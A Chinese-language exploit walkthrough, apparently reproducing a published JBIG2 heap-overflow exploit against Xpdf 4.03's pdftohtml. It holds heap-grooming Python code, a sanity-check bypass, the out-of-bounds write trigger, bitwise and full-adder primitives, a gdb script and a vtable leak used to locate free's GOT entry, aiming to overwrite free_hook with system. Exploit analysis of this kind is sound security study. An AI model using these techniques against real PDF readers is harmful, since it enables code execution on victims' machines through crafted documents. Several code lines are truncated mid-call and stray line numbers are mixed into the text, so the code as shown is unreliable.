0x3b0 [  2]: 0x555555797250 —▸ 0x5555557a79d0 ◂— 0x0
0x3c0 [  1]: 0x5555557d39d0 ◂— 0x0
0x3d0 [  1]: 0x5555557cccc0 ◂— 0x0
0x400 [  1]: 0x55555576aa50 ◂— 0x0
0x410 [  3]: 0x555555797810 —▸ 0x5555557bf1d0 —▸ 0x5555557a7f90 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x5555558304b0 —▸ 0x7ffff7ad8c00 (main_arena+96) ◂— 0x5555558304b0
smallbins
0x20: 0x5555557a99e0 —▸ 0x7ffff7ad8c10 (main_arena+112) ◂— 0x5555557a99e0
0xb0: 0x5555557f82f0 —▸ 0x7ffff7ad8ca0 (main_arena+256) ◂— 0x5555557f82f0
0xf0: 0x5555557d0ab0 —▸ 0x7ffff7ad8ce0 (main_arena+320) ◂— 0x5555557d0ab0
0x120: 0x5555557992f0 —▸ 0x7ffff7ad8d10 (main_arena+368) ◂— 0x5555557992f0
0x190: 0x5555557f7df0 —▸ 0x5555557f8d70 —▸ 0x5555557f8f60 —▸ 0x5555557f7a10 —▸ 0x5555557fe570 ◂— ...
0x1c0 [corrupted]
FD: 0x5555557f1a30 —▸ 0x5555557f4780 —▸ 0x5555557d15f0 —▸ 0x5555557e49d0 —▸ 0x55555579ecf0 ◂— ...
BK: 0x5555557d0c90 —▸ 0x5555557d06f0 —▸ 0x5555557d1410 —▸ 0x5555557d0e70 —▸ 0x55555579e390 ◂— ...
0x1d0 [corrupted]
FD: 0x5555557f9910 —▸ 0x5555557f9720 —▸ 0x5555557f85b0 —▸ 0x5555557fe960 —▸ 0x5555557f66b0 ◂— ...
BK: 0x5555557f9530 —▸ 0x5555557f9150 —▸ 0x5555557fb050 —▸ 0x5555557fdd90 —▸ 0x5555557fd1e0 ◂— ...
0x1e0 [corrupted]
FD: 0x5555557a13c0 —▸ 0x5555557a0bc0 —▸ 0x5555557a11c0 —▸ 0x5555557a0570 —▸ 0x5555557a0770 ◂— ...
BK: 0x5555557fcbf0 —▸ 0x5555557fc9f0 —▸ 0x5555557fdb90 —▸ 0x5555557fe760 —▸ 0x5555557fc210 ◂— ...
0x1f0: 0x5555557ba930 —▸ 0x5555557f1120 —▸ 0x5555557d19b0 —▸ 0x5555557befd0 —▸ 0x7ffff7ad8de0 (main_arena+576) ◂— ...
0x200: 0x5555557a9b00 —▸ 0x5555557df570 —▸ 0x5555557a8500 —▸ 0x7ffff7ad8df0 (main_arena+592) ◂— 0x5555557a9b00
0x220 [corrupted]
FD: 0x5555557f3c20 —▸ 0x5555557ecce0 —▸ 0x5555557e8180 —▸ 0x5555557f57f0 —▸ 0x5555557ee5a0 ◂— ...
BK: 0x5555557f4540 —▸ 0x5555557f2130 —▸ 0x5555557f27e0 —▸ 0x5555557eec60 —▸ 0x5555557f2ea0 ◂— ...
0x230 [corrupted]
FD: 0x5555557ae810 —▸ 0x5555557f49d0 —▸ 0x5555557e2710 —▸ 0x5555557f4c20 —▸ 0x5555557a0970 ◂— ...
BK: 0x5555557f0a20 —▸ 0x5555557a23a0 —▸ 0x5555557e5a20 —▸ 0x5555557a3d20 —▸ 0x5555557a3f70 ◂— ...
0x240 [corrupted]
FD: 0x5555557f5590 —▸ 0x5555557f1330 —▸ 0x5555557e3730 —▸ 0x5555557f4e70 —▸ 0x5555557a1ef0 ◂— ...
BK: 0x5555557ec840 —▸ 0x5555557f50d0 —▸ 0x5555557a4660 —▸ 0x5555557e4090 —▸ 0x5555557f5330 ◂— ...
0x250: 0x55555579a760 —▸ 0x7ffff7ad8e40 (main_arena+672) ◂— 0x55555579a760
0x270 [corrupted]
FD: 0x5555557dd3a0 —▸ 0x5555557e1a10 —▸ 0x5555557e0810 —▸ 0x5555557e02e0 —▸ 0x5555557e0aa0 ◂— ...
BK: 0x5555557a54a0 —▸ 0x5555557a5210 —▸ 0x5555557e1f40 —▸ 0x5555557e0aa0 —▸ 0x5555557e02e0 ◂— ...
0x280 [corrupted]
FD: 0x5555557c7560 —▸ 0x5555557b0d70 —▸ 0x5555557e0570 —▸ 0x5555557df2d0 —▸ 0x5555557df810 ◂— ...
BK: 0x5555557e21d0 —▸ 0x5555557deaf0 —▸ 0x5555557df030 —▸ 0x5555557e2470 —▸ 0x5555557ded90 ◂— ...
0x290: 0x5555557acb70 —▸ 0x5555557ddb10 —▸ 0x5555557e0030 —▸ 0x5555557e1760 —▸ 0x5555557de5a0 ◂— ...
0x2a0: 0x5555557dfd70 —▸ 0x5555557dfab0 —▸ 0x7ffff7ad8e90 (main_arena+752) ◂— 0x5555557dfd70
0x2c0: 0x5555557a5f50 —▸ 0x5555557f5c90 —▸ 0x7ffff7ad8eb0 (main_arena+784) ◂— 0x5555557a5f50 /* 'P_zUUU' */
0x340: 0x5555557f5f70 —▸ 0x5555557ac410 —▸ 0x7ffff7ad8f30 (main_arena+912) ◂— 0x5555557f5f70
0x380: 0x5555557c69a0 —▸ 0x7ffff7ad8f70 (main_arena+976) ◂— 0x5555557c69a0
0x390: 0x5555557d7c70 —▸ 0x7ffff7ad8f80 (main_arena+992) ◂— 0x5555557d7c70 /* 'p|}UUU' */
0x3b0: 0x5555557c54c0 —▸ 0x7ffff7ad8fa0 (main_arena+1024) ◂— 0x5555557c54c0
0x3f0: 0x5555557bd580 —▸ 0x7ffff7ad8fe0 (main_arena+1088) ◂— 0x5555557bd580
largebins
0x580: 0x5555557cc2b0 —▸ 0x555555797d80 —▸ 0x7ffff7ad9050 (main_arena+1200) ◂— 0x5555557cc2b0
0x600: 0x5555557c7db0 —▸ 0x7ffff7ad9070 (main_arena+1232) ◂— 0x5555557c7db0
0x640: 0x5555557be580 —▸ 0x7ffff7ad9080 (main_arena+1248) ◂— 0x5555557be580
0x780: 0x5555557ea9f0 —▸ 0x5555557cb9e0 —▸ 0x7ffff7ad90d0 (main_arena+1328) ◂— 0x5555557ea9f0
0x800: 0x5555557985d0 —▸ 0x7ffff7ad90f0 (main_arena+1360) ◂— 0x5555557985d0
0x840: 0x5555557cdc00 —▸ 0x7ffff7ad9100 (main_arena+1376) ◂— 0x5555557cdc00
0x900: 0x5555557bdba0 —▸ 0x7ffff7ad9130 (main_arena+1424) ◂— 0x5555557bdba0
0x940: 0x5555557e77f0 —▸ 0x5555557e9b00 —▸ 0x7ffff7ad9140 (main_arena+1440) ◂— 0x5555557e77f0
0x980: 0x5555557d86b0 —▸ 0x5555557ebea0 —▸ 0x7ffff7ad9150 (main_arena+1456) ◂— 0x5555557d86b0
0x9c0: 0x555555795c40 —▸ 0x7ffff7ad9160 (main_arena+1472) ◂— 0x555555795c40 /* '@\\yUUU' */
0xa00: 0x5555557cd080 —▸ 0x7ffff7ad9170 (main_arena+1488) ◂— 0x5555557cd080
0xa40: 0x555555799440 —▸ 0x5555557d1e40 —▸ 0x7ffff7ad9180 (main_arena+1504) ◂— 0x555555799440
0xac0: 0x5555557e83c0 —▸ 0x5555557e6100 —▸ 0x7ffff7ad91a0 (main_arena+1536) ◂— 0x5555557e83c0
0xb00: 0x5555557d2a20 —▸ 0x7ffff7ad91b0 (main_arena+1552) ◂— 0x5555557d2a20 /* ' *}UUU' */
0xb40: 0x5555557e6c70 —▸ 0x5555557feb50 —▸ 0x7ffff7ad91c0 (main_arena+1568) ◂— 0x5555557e6c70 /* 'pl~UUU' */
0xc40: 0x5555557eb210 —▸ 0x5555557e8ea0 —▸ 0x7ffff7ad9200 (main_arena+1632) ◂— 0x5555557eb210
0xe00: 0x5555557c00c0 —▸ 0x5555557b9630 —▸ 0x5555557c4590 —▸ 0x7ffff7ad9210 (main_arena+1648) ◂— 0x5555557c00c0
0x1400: 0x5555557b5420 —▸ 0x7ffff7ad9240 (main_arena+1696) ◂— 0x5555557b5420 /* ' T{UUU' */
0x1600: 0x5555557ce770 —▸ 0x7ffff7ad9250 (main_arena+1712) ◂— 0x5555557ce770
0x1800: 0x5555557bae40 —▸ 0x7ffff7ad9260 (main_arena+1728) ◂— 0x5555557bae40
0x2600: 0x5555557b6aa0 —▸ 0x5555557c1110 —▸ 0x7ffff7ad92d0 (main_arena+1840) ◂— 0x5555557b6aa0
0x2a00: 0x55555579af20 —▸ 0x7ffff7ad92f0 (main_arena+1872) ◂— 0x55555579af20
0x3000: 0x5555557d3d80 —▸ 0x5555557d9b60 —▸ 0x5555557c88a0 —▸ 0x7ffff7ad9300 (main_arena+1888) ◂— 0x5555557d3d80

这些碎片堆块对于接下来的堆风水是相当不利的，因此需要将其全部分配掉。这里使用的是 PageInfoSeg 来分配内存，因为通读代码可以发现 JBIG2Stream::readPageInfoSeg 函数除了分配一个堆块以外，没有产生其他任何影响：

def DummyAlloc(size):
    return PageInfo(233, w=8, h=size)

global_file = [
    SymbolDict(0, [Bitmap(1, 1)] * 0x10000),
    SymbolDict(1, [Bitmap(1, 1)] * (size_to_overflow // 8)),
    SymbolDict(2, [Bitmap(1, 1)]),
    # Heap grooming: eat every chunk in {tcache,fast,small,large,unsorted} bins
    [[DummyAlloc(size)] * 128 for size in range(0x10, 0x1000, 0x10)],
    [[DummyAlloc(size)] * 16 for size in range(0x1000, 0x10000, 0x100)],
]

分配后的 bin 如下所示，可以看到清爽了不少：

pwndbg> bins
tcachebins
empty
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0x20 [corrupted]
FD: 0x55555579d9f0 —▸ 0x5555557d2860 —▸ 0x555555798db0 —▸ 0x5555557d7fe0 —▸ 0x5555557d7c30 ◂— ...
BK: 0x5555557f96e0 —▸ 0x5555557f9300 —▸ 0x5555557fb200 —▸ 0x5555557fdf40 —▸ 0x5555557fd390 ◂— ...
largebins
empty

那么接下来的问题是，如何设计堆风水？exploit 给了一个清晰明了的做法：

利用 global segment GList 满则扩增的特性创建堆空洞，进而让其他结构体来占据这些内存空洞，完成堆风水。

什么意思呢？我们看看 GList 的一些类方法：

GList::GList() {
  size = 8;
  data = (void **)gmallocn(size, sizeof(void*));
  length = 0;
  inc = 0;
}

void GList::append(void *p) {
  if (length >= size) {
    expand();
  }
  data[length++] = p;
}

void GList::expand() {
  size += (inc > 0) ? inc : size;
  data = (void **)greallocn(data, size, sizeof(void*));
}

可以看到，初始时 GList size 为 8。当 GList 中元素个数超过容量时，GList 容量将会双倍扩增。也就是说，初始时的 size 为 8，下次扩增后的 size 是 16，再下次扩增后的 size 为 32，再下下次的 size 为 64（单位，个指针）。

扩增所使用的堆函数为 realloc，即当 GList 容量扩增后，原先那个堆块将被释放。同时又因为上面已经将其余全部小堆块全都分配出去了，因此 GList 容量扩增所分配的新堆块，一定来自于 top chunk，这就能保证每次 GList 容量扩张时，新堆块的分配顺序一定是从低地址向高地址分配。

因此尝试让 global segment GList 多次扩展，从 8 扩展至我们所需要的最终大小 64：

代码中的 glist_capacity == 32。个人认为这个数表示的是第几次 append global GList 时会扩充 GList size 至 64。

global_file = [
    SymbolDict(0, [Bitmap(1, 1)] * 0x10000),
    SymbolDict(1, [Bitmap(1, 1)] * (size_to_overflow // 8)),
    SymbolDict(2, [Bitmap(1, 1)]),
    # Heap grooming: eat every chunk in {tcache,fast,small,large,unsorted} bins
    [[DummyAlloc(size)] * 128 for size in range(0x10, 0x1000, 0x10)],
    [[DummyAlloc(size)] * 16 for size in range(0x1000, 0x10000, 0x100)],
    # ------------ 开始尝试堆风水 ------------
    [SymbolDict(i, []) for i in range(3, glist_capacity // 2)],
    # Now most bins are empty, except tcachebin 0x20, 0x50 and small bin 0x20
    # This triggers GList::expand(), 0x80 -> 0x100; allocates from top chunk
    SymbolDict(glist_capacity // 2, []),
    [SymbolDict(i, []) for i in range(glist_capacity // 2 + 1, glist_capacity)],
    # 0x100 -> 0x200, the old chunk should fall in tcache
    SymbolDict(100, []),
]

global segment 的堆风水执行结束后，其堆布局大致如下：

注意 segNum 从 3 开始的 Symbol Dict，其结构体所分配的堆块（chunk size = 0x40）也是直接来自于 top chunk 。

// low address --------------------------------------------
/*
    一些其他的堆块分配，包括
    1. size=8 的 global GList backing store
    2. DummyAlloc
    3. SymbolDict0、1、2
    4. ...
*/
SymbolDict3-8;
size=16 的 global GList backing store 堆空洞
SymbolDict9-16;
size=32 的 global GList backing store 堆空洞
SymbolDict17-32;
size=64 的 global GList backing store // 最终的 GList data 堆位置，这里可不是堆空洞
// high address -------------------------------------------

接下来，只需分别

让 pageBitmap backing store 占据 size=16 的 Glist 堆空洞
让解析 TextRegion 时创建的 syms 指针数组占据 size=32 的 Glist 堆空洞

即可完成堆布局。

pageBitmap 的 JBIG2Bitmap 结构体堆位置在下文中将会说明。

最后贴个 gdb script，可以使用该 gdbscript 辅助观察内存布局：

file ../../xpdf-4.03/build/xpdf/pdftohtml
aslr off
set follow-fork-mode parent

b readSymbolDictSeg if segNum==8
commands
    printf "sakura in read symbol 8\n"

    printf "globalSegments addr is:0x%llx\n", segments
    printf "segments GList backing buffer\n"
    p *(GList *)segments
    # tcachebins
    bins
    # c
end
b readSymbolDictSeg if segNum==16
commands
    printf "sakura in read symbol 16\n"

    printf "globalSegments addr is:0x%llx\n", segments
    printf "segments GList backing buffer\n"
    p *(GList *)segments
    # tcachebins
    bins
    # c
end
b readSymbolDictSeg if segNum==100
commands
    printf "sakura in read symbol 32\n"

    printf "globalSegments addr is:0x%llx\n", segments
    printf "segments GList backing buffer\n"
    p *(GList *)segments
    # tcachebins
    bins

    tb JBIG2Stream.cc:1481
    commands
        printf "after finish globalSegments addr is:0x%llx\n", segments
        p *(GList *)segments
        # tcachebins
        bins
    end
    # replace finish and print info
    # c
end

b JBIG2Stream.cc:2072 if segNum==102
commands
    printf "sakura in TextRegion to trigger oob\n"
    printf "numSyms after underoverflow is:0x%llx\n", numSyms
    set $oob_syms = $rax
    printf "undersized syms buffer addr is:0x%llx\n", $oob_syms

    printf "globalSegments addr is:0x%llx\n", globalSegments
    printf "segments GList backing buffer\n"
    p *(GList *)globalSegments

    printf "pageBitmap addr is :0x%llx\n", pageBitmap
    p *(JBIG2Bitmap *)pageBitmap
    bins

end

r sploit.pdf output

b. 占据堆空洞

global stream 中的解析操作是为了创建堆空洞，那 main stream 的解析操作就是为了占据堆空洞。

承接上文，接下来我们试着分配一个全新的 pageBitmap 结构，并让其 backing store 占据 size=16 的 Glist 空洞：

代码中的 GLIST_DATA_SIZE = 0x200，表示 size=64 时 global glist data 占据的字节数。

page0 = [
    # Make sure page bitmap buffer uses the second-last globalSegments data buffer so
    # that it lies just before syms, at a fixed offset.
    # GLIST_DATA_SIZE // 4，表示占据 size=16 时的 glist 堆空洞
    PageInfo(101, w=8 * (GLIST_DATA_SIZE // 4), h=1),
]

此时堆布局如下：

// low address --------------------------------------------
/*
    一些其他的堆块分配，包括
    1. size=8 的 global GList backing store
    2. DummyAlloc
    3. SymbolDict0、1、2
    4. ...
*/
SymbolDict3-8;

// 注意这里！
pageBitmap backing buffer // size=16 的 global GList backing store 堆空洞

SymbolDict9-16;

size=32 的 global GList backing store 堆空洞

SymbolDict17-32;

size=64 的 global GList backing store; // 最终的 GList data 堆位置，这里可不是堆空洞

// 注意这里！
pageBitmap JBIG2Bitmap; 结构体

// high address -------------------------------------------

这里简单说一下 pageBitmap 结构本身的堆块分配(JBIG2Bitmap)，由于其 size 0x20 在堆链上找不到可分配的堆块，因此将仍然从 top chunk 中分配，故其地址位于 size=64 的 Glist 位置的高地址处，满足堆风水要求。

接下来需要在解析 TextRegion 时继续占用 size=32 的 Glist 堆空洞。因此 TextRegion 中创建的用户内存大小必须是 syms_size = GLIST_DATA_SIZE // 2，正好对应到 size=32 的 Glist 堆空洞大小。

但在做进一步的利用之前，我们需要绕过一个比较有趣的 sanity check：

// sanity check: if the w/h/x/y values are way out of range, it likely
// indicates a damaged JBIG2 stream
if (w / 10 > pageW || h / 10 > pageH ||
    x / 10 > pageW || y / 10 > pageH) {
    error(errSyntaxError, getPos(),
          "Bad size or position in JBIG2 text region segment");
    done = gTrue;
    return;
}

xpdf-4.03/xpdf/JBIG2Stream.cc 中多次出现上面的这种 sanity check，判断当前正在处理的 w是否越过了当前的 pageW 和 pageH（两个 JBIG2Stream 类的成员变量，用于表示当前 page 的宽度和高度），如果越界则说明当前解析过程可能存在问题，那么则立即停止解析当前 segment。

看上去好像这个 sanity check 没啥问题……

但实际上，我们回过头看看 readPageInfoSeg 函数的代码：

void JBIG2Stream::readPageInfoSeg(Guint length)
{
    Guint xRes, yRes, flags, striping;
    // 从不受信任的流中直接读入 pageW 和 pageH
    if (!readULong(&pageW) || !readULong(&pageH) ||
        !readULong(&xRes) || !readULong(&yRes) ||
        !readUByte(&flags) || !readUWord(&striping))
    {
        goto eofError;
    }
    // 如果 pageW 和 pageH 过大
    if (pageW == 0 || pageH == 0 || pageW > INT_MAX / pageW)
    {
        // 则直接退出 pageInfoSeg 的解析
        error(errSyntaxError, getPos(), "Bad page size in JBIG2 stream");
        return;
    }
    [...]
}

我们可以非常容易的发现，即便 readPageInfoSeg 函数中检测到了 pageW 和 pageH 的异常，但也只是简单的退出掉当前 seg 的解析，保留了畸形 pageW 和 pageH 的值在 JBIG2Stream 类成员中。

这样，我们可以尝试插入一个超大 pageW 和 pageH 的 PageInfoSeg，从而污染这两个字段为超大值，bypass 后续所有新增加的 sanity check：

page0 = [
    # Make sure page bitmap buffer uses the second-last globalSegments data buffer so
    # that it lies just before syms, at a fixed offset.
    PageInfo(101, w=8 * (GLIST_DATA_SIZE // 4), h=1),
    # Change pageH and pageW to a large value to bypass a (seriously funny) sanity
    # check introduced in Xpdf 4.03; Xpdf would report an error without allocating
    # a new pageBitmap, but won't stop parsing the JBIG2 stream, which is exactly what
    # we want.
    PageInfo(101, w=1919114514, h=1919114514),
]

bypass 掉这个 sanity check 后，接下来就可以尝试创建 TextRegionSeg 来进行堆溢出了。承接上面所说的，这里所创建的 TextRegionSeg 需要满足几种要求：

其内部创建的 syms 大小必须是 syms_size（这个值上面已经说明了）
向堆块写入的数据大小为 size_to_overflow 个字节，即实际写 size_to_overflow // 8 个指针

因此接下来在 main stream 中，需要合理组合 TextRegion 所引用的 Symbol Dict 大小：

# Trigger the out-of-bound write.
TextRegion(
    102,
    w=1,
    h=1,
    x=0,
    y=0,
    # size_to_overflow // 8 个指针
    ref_segs=[1]
    # 0x10000 + (syms_size - size_to_overflow) // 8 个指针
    + [2] * (0x10000 + (syms_size - size_to_overflow) // 8)
    # 共 0xffff0000 个指针
    + [0] * 0xFFFF,
),

上面代码的组合中，

sizetooverflow/8 + {0x10000 + (symssize − sizetooverflow)/8} + 0xffff0000 = 0x*100000000 + *symssize/8，即刚好分配 syms_size 个字节。

又因为先 ref 的那个 Symbol Dict 的大小为 size_to_overflow // 8 个指针。因此当 readTextRegion 解析第一个 ref 的 Symbol Dict 时，刚好向 syms 堆块中写入 size_to_overflow 个字节，直接溢出至 pageBitmap JBIG2Bitmap 结构体头部位置，如此便能达到溢出的目的。

这里说明一下 size_to_overflow 是怎么得出的，先上堆布局：

// low address --------------------------------------------
/*
    一些其他的堆块分配，包括
    1. size=8 的 global GList backing store
    2. DummyAlloc
    3. SymbolDict0、1、2
    4. ...
*/
SymbolDict3-8;
pageBitmap backing buffer // size=16 的 global GList backing store 堆空洞
SymbolDict9-16;

// 从此处开始写入数据
syms // syms 的 size 为 syms_size
SymbolDict17-32; // 16 个 SymbolDict 的 size，一个 SymbolDict 的 size 为 0x40 字节
size=64 的 global GList backing store; // 此时的 Glist size 为 GLIST_DATA_SIZE
pageBitmap JBIG2Bitmap 结构体  // 这里还需要覆写 vtble + segNum + w + h + line，共24字节

// high address -------------------------------------------

根据堆布局可得知：

size_to_overflow = (
    ptmalloc_chunk_size(syms_size)
    # 40: sizeof(JBIG2SymbolDict); there are (glist_capacity // 2) irrelevant JBIG2SymbolDict-s
    + ptmalloc_chunk_size(40) * (glist_capacity // 2)
    + ptmalloc_chunk_size(GLIST_DATA_SIZE)
    # Current page JBIG2Bitmap
    # vtbl(8)
    + 8
    # segNum(4), w(4), h(4), line(4)
    + 4 * 4
)

之后，将 readTextRegionSeg 中刚刚被释放掉的那个 syms_size 大小的堆块再次分配回来，防止在后续的利用中出现可能的崩溃。

1 2	# Take back the free-d syms, hold it to prevent potential crash. GenericRegion(103, imm=False, bitmap=Bitmap(8, syms_size)),

由于越界写入 pageBitmap JBIG2Bitmap 结构体头部位置的是指针值，可以越界读写的数据有限，因此我们需要根据这个有限的 pageBitmap 越界读写原语，来自己修改自己的 JBIG2Bitmap 结构体头，将其中的 w修改的更大，扩展自己的读写范围。根据上面的堆布局，同样可以得出 page_bitmap_buf 至 pageBitmap JBIG2Bitmap 的距离：

page_bitmap_buf_to_class_offset = (
    ptmalloc_chunk_size(GLIST_DATA_SIZE // 4)
    + ptmalloc_chunk_size(40) * (glist_capacity // 4)
    + size_to_overflow
    - 4 * 4
    - 8
)

之后将其 w分别更改为 w = 227、h = 224、line = 224：

imm 为 true 表示即时渲染，即立即修改 pageBitmap 上的指定位置。

# Overwrite pageBitmap->w, h and line
GenericRegion(
    104,
    x=(page_bitmap_buf_to_class_offset + 12) * 8,
    y=0,
    comb_op=CombOp.Replace,
    # (x, y) -> mem[(y << 24) | (x >> 3)] >> (7 - (x & 7)), max 48-bit addressing
    bitmap=Bitmap(struct.pack("
    imm=True,
),

修改后的 pageBitmap 的二维空间构造：

+------------------> w=2^27 bit
|
|
|
|
|
|
V h=2^24 bit

最后创建带有 16 个 Bitmap 的 SymbolDict ，以备接下来的利用所使用：

# 16 "variables". Since we can only do bitwise operations relative to page bitmap
# with Refinement regions, we need these variables for peeking other absolute
# addresses, and also rebase the page bitmap in one segment command.
SymbolDict(105, [Bitmap(64, 1)] * 16)

这些 SymbolDict 将用于地址解引用原语中，具体在下面会详细介绍。

整体的堆风水布局大体如上所示。完成堆溢出后，pageBitmap 具备了大偏移读写的功能，因此接下来就要开始写原语利用了。

2. 位运算原语

还记得先前介绍的 GenericRefinementRegionSeg 么（不记得就翻到上面看看），接下来我们需要利用这个 seg 的特性来编写任意位的位运算器。

exploit 中实现的位运算器如下所示：

class BitSeg:
    _seq = itertools.count(10000)

    def __init__(self, seg_num):
        self.seg_num = seg_num
        self.__consumed = False

    def consume(self):
        assert not self.__consumed
        self.__consumed = True
        return self.seg_num

    @classmethod
    def from_page(cls, offset):
        x, y = offset % 2 ** 27, offset // 2 ** 27
        idx = next(cls._seq)
        page0.append(ReadoutRefinement(idx, x=x, y=y, imm=False))
        return cls(idx)

class CombOp(enum.IntEnum):
    Or = 0
    And = 1
    Xor = 2
    Xnor = 3
    Replace = 4

def bitop(oa, ob, op: CombOp):
    b = BitSeg.from_page(ob)
    x, y = oa % 2 ** 27, oa // 2 ** 27
    page0.append(
        ReadoutRefinement(65536, x=x, y=y, imm=True, ref=b.consume(), comb_op=op)
    )

原语 bitop 的 oa、ob 两个参数的单位为 bit，op 有 5 种。

bitop 原语初始时将一维偏移量 oa、ob 分别映射至 bitmap 的二维偏移量 xy1、xy2，之后在解析 ob 对应的 RefinementRegionSeg 时，从 pageBitmap 中取出对应 xy2 的数据，并将其存入 segments 中。

一维偏移量向二维偏移量映射时，为什么使用的是 2^27 作为除数/模数呢？因为这是上面所修改后的 width 的大小。

接下来当 hso 解析 oa 对应的 RefinementRegionSeg 时，hso 会重新读入先前存入的 ob 对应的 RefinementRegion，并将其与 pageBitmap 特定 xy1 位置进行位运算，达到指定 pageBitmap 上任意两位之间进行位运算的目的。

这里需要注意的是，findSegment 查找算法的核心，是依次遍历 segments 列表的元素并比对 segNum 来进行查找。因此每次添加进 segment 的 RefinementRegion，其 segNum 一定不能与之前 append 进去的 segments 相同！

当位运算原语 binop 可用后，接下来就可以构建其他原语：

bitwise_mov = lambda a, b: bitop(a, b, CombOp.Replace)
bitwise_xor = lambda a, b: bitop(a, b, CombOp.Xor)
bitwise_and = lambda a, b: bitop(a, b, CombOp.And)
bitwise_or = lambda a, b: bitop(a, b, CombOp.Or)

def op_q_q(oa, ob, op: CombOp):
    for i in range(64):
        bitop(oa * 8 + i, ob * 8 + i, op)

# Offsets are in bytes.
mov_q_q = lambda a, b: op_q_q(a, b, CombOp.Replace)
xor_q_q = lambda a, b: op_q_q(a, b, CombOp.Xor)
and_q_q = lambda a, b: op_q_q(a, b, CombOp.And)
or_q_q = lambda a, b: op_q_q(a, b, CombOp.Or)

这里的 op_q_q 原语，其 oa、ob 参数的单位为字节（注意和 binop 的单位并不相同）。

op_q_q 原语的目的，是对给定 oa 和 ob 的相对一维偏移字节所对应的两个位置，做一次8字节位运算。

举个例子，原语 and_q_q(0, 8)，执行的操作为：

将偏移量为 0字节 的位置上的八字节(即 0-7 这8个字节)，与 偏移量为 8字节 的位置上的八字节（即 8-15 这8字节），进行一次一一对应的 and 运算。
将运算结果放置在偏移量为 0字节 的位置上的八字节(即 0-7 这8个字节)上。

这个原语其实很好理解，只是用文字记录下来感觉不太好记录，也可能是我文笔不太好。

之后便是通过位运算来构建8字节全加器，可以先看看这篇文章再看看代码：

# Don't worry, Libra won't hu^W^W^W Xpdf allocates 1 more byte
adder_buf_offset = GLIST_DATA_SIZE // 4 * 8 # 1024

def add_q_q(oa, ob):
    oa, ob = oa * 8, ob * 8
    ab_xor, ab_and, carry, ab_xor_c_and, zero = range(
        adder_buf_offset, adder_buf_offset + 5
    )
    # 初始时，最低位全加器的进位标志为0
    bitwise_mov(carry, zero)
    # 8字节 = 64 位，因此这里的 range 为 64
    for i in range(64):
        # 这里是每个 **位** 的全加器，一个全加器由两个半加器构成
        a_bit_offset = oa + i // 8 * 8 + (7 - i % 8)
        b_bit_offset = ob + i // 8 * 8 + (7 - i % 8)
        # This is a naive full-adder. Applying TIS-100 skill could cut 3~4 ops maybe.
        # 首先是第一个半加器
        bitwise_mov(ab_xor, a_bit_offset)
        bitwise_xor(ab_xor, b_bit_offset)
        bitwise_mov(ab_and, a_bit_offset)
        bitwise_and(ab_and, b_bit_offset)
        # 其次是第二个半加器
        bitwise_mov(a_bit_offset, ab_xor)
        bitwise_xor(a_bit_offset, carry)  # output (S)
        bitwise_mov(ab_xor_c_and, ab_xor)
        bitwise_and(ab_xor_c_and, carry)
        # 设置进位标志
        bitwise_mov(carry, ab_and)
        bitwise_or(carry, ab_xor_c_and)

其全加器结构如下所示：

3. 立即数运算原语

除了上面所介绍的位运算原语以外，还有加载外部立即数计算的原语。

def op_q_imm(offset, imm, op):
    offset *= 8
    x, y = offset % 2 ** 27, offset // 2 ** 27
    page0.append(
        GenericRegion(
            233, x=x, y=y, comb_op=op, bitmap=Bitmap(struct.pack("
        )
    )

mov_q_imm = lambda o, imm: op_q_imm(o, imm, CombOp.Replace)
xor_q_imm = lambda o, imm: op_q_imm(o, imm, CombOp.Xor)
and_q_imm = lambda o, imm: op_q_imm(o, imm, CombOp.And)
or_q_imm = lambda o, imm: op_q_imm(o, imm, CombOp.Or)

readGenericRegionSeg 方法可从外部 JBIG2Stream 流中读入一个 bitmap 并将其与 pageBitmap 上的特定位置进行运算，因此 GenericRegionSeg 可用于此处的立即数运算原语。

4. 地址解引用原语

当我们有了某个指针的绝对地址后，我们如何将这个指针从该绝对地址中读取出来呢？这就需要用到地址解引用操作。这里，exploit 准备了两个原语：

rebase_variable_q：将 pageBitmap 中一维偏移为 addr_page_offset 处的 8 字节数据，复制进堆风水中最后一步所创建的带有 16 个 Bitmap 的 SymbolDict 中，第 idx 个 JBIG2Bitmap 的 data 字段上：
注意，是直接将值覆盖在 JBIG2Bitmap 的 data 字段上，而不是写进 data 指针所指向的内存上。
1
2
3
4
5
def rebase_variable_q(idx, addr_page_offset):
mov_q_q(
variable_bitmap_offset + idx * ptmalloc_chunk_size(0x20) + 0x18,
addr_page_offset,
)

load_variable：读取最后一个 Symbol Dict 中，第 idx 个 JBIG2Bitmap backing store 里的（即 data 指针解引用后的内存上）的第一个 8 字节数据，至 pageBitmap 中一维偏移为 to_page_offset 处的 8 字节内存位置。

def load_variable(to_page_offset, idx):
    to_page_offset *= 8
    x, y = to_page_offset % 2 ** 27, to_page_offset // 2 ** 27
    page0.append(
        TextRegion(
            233,
            x=x,
            y=y,
            w=64,
            h=1,
            imm=True,
            instances=[idx],
            ref_symbol_cnt=16,
            ref_segs=[105],
        )
    )

这两个原语一结合，就能达到地址解引用的目的。

5. 整体利用流程

各类原语已经都准备好了，接下来便是结合这些原语覆写 free_hook 为 libc_system 的地址。

首先，我们需要 leak 一个地址出来（这个地址自然不能是堆地址），通过查看堆布局：

// low address .....
...
SymbolDict3-8;
pageBitmap backing buffer // size=16 的 global GList backing store 堆空洞
SymbolDict9-16;
...
// high address .....

可以看到紧临着 pageBitmap 的便是 SymbolDict，因此我们可以尝试读取其虚表指针。

1
2
3

# vtbl of a JBIG2SymbolDict adajacent to page bitmap buffer
# 取出vtbl地址放到+0处
mov_q_q(0, ptmalloc_chunk_size(GLIST_DATA_SIZE // 4))

之后从外部读取一个相对偏移至 pageBitmap data + 8 的位置：

# 计算出-vtbl_offset + free_got_offset
mov_q_imm(
    8, (-PDFTOHTML_VTBL_JBIG2SYMBOLDICT_OFFSET + PDFTOHTML_FREE_GOT_OFFSET) % 2 ** 64
)

然后再简单做个加法，就能得到 free 条目在 GOT 表上的绝对地址，放到 +0 处：

1 2	# 计算vtbl地址+(-vtbl_offset + free_got_offset)得到free_got的地址，放到+0处 add_q_q(0, 8)

接下来，尝试对该 free.got 地址进行解引用，获取 free.libc 地址：

# 从+0处取出free_got的地址，放到第0个"变量"data 指针处
rebase_variable_q(0, 0)
